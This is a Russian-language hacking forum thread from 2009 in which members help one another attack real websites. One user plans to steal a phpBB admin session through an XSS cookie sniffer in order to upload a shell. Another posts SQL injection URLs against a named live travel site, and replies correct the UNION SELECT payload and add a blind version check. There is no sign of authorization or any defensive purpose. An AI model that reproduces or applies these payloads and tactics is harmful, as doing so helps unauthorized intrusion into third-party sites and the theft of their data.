17.07.2009, 23:11
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
С нами:
8886744
Репутация:
-67
|
|
Люди, я растроен ппц. нашол xss на сайте с форумом phpbb 2.0.xx
уже написал снифак. но перед этим поставил себе для теста этот форум на локал хост.
узнал что там в куках не хэш админа, а ссесия. причём чтобы войти в админку ссесия не поможет. так что надо вводить пасс. люди пожскажите. может я ошибаюсь. если я получу ссесию админа на phpbb то у меня я так понял не получиться зайти в админку и следовательно залить шелл?
|
|
|
17.07.2009, 23:20
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
С нами:
9610769
Репутация:
380
|
|
Сообщение от nub-hacker
Люди, я растроен ппц. нашол xss на сайте с форумом phpbb 2.0.xx
уже написал снифак. но перед этим поставил себе для теста этот форум на локал хост.
узнал что там в куках не хэш админа, а ссесия. причём чтобы войти в админку ссесия не поможет. так что надо вводить пасс. люди пожскажите. может я ошибаюсь. если я получу ссесию админа на phpbb то у меня я так понял не получиться зайти в админку и следовательно залить шелл?
Если не ошибаюсь - там как бы сессия админа(та что в админ панель после конферма) к IP привязываеться, найти/поднять проксик с его IP(что мне кажеться будет еще сложнее чем покоцать этот форум).
|
|
|
|
17.07.2009, 23:13
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Нет, надо знать пароль, с сессией можешь только творить дела на форуме, которые может творить админ - удалять, читать закрытые разделы и etc.
|
|
|
|
20.07.2009, 00:20
|
|
Banned
Регистрация: 27.06.2009
Сообщений: 200
С нами:
8880439
Репутация:
68
|
|
У меня вопрос. Я тут
http://www.bringitontours.com/package/index.php?destination_id=
Хотел заюзать уязвимость в БД, определил количество таблиц 3, но неполучаеться узнать их названия. Вот запрос
http://www.bringitontours.com/package/index.php?destination_id=1+union+select+table_sche ma,table_name,1,2,3+from+information_schema.tables .
Где ошибка? |
|
|
|
20.07.2009, 00:28
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
С нами:
9594385
Репутация:
386
|
|
2 +casper+
1) ты неправильно составил запрос ... должно было быть так
http://www.bringitontours.com/package/index.php?destination_id=-1+union+select+1,2,version()
2)там стоит 4 ветка соответсвено там нет information_schema |
|
|
|
20.07.2009, 00:32
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
В ДНК, 4-ая ветка потому что:
Код:
http://www.bringitontours.com/package/index.php?destination_id=1+and+substring(version(),1,1)=4
|
|
|
|
20.07.2009, 00:48
|
|
Banned
Регистрация: 27.06.2009
Сообщений: 200
С нами:
8880439
Репутация:
68
|
|
А как мне правильно сформировать запрос что б глянуть названия всех таблиц?
|
|
|
|
20.07.2009, 00:57
|
|
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
С нами:
10216668
Репутация:
930
|
|
Только перебор. Сипт в подписи предыдущего дяди  |
|
|
|
20.07.2009, 12:09
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
С нами:
8947056
Репутация:
229
|
|
Собственно есть пароль... Надо его преобразовать в mysql5 хеш, как это сделать?
|
|
|
|
20.07.2009, 12:14
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
http://www.insidepro.com/hashes.php
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
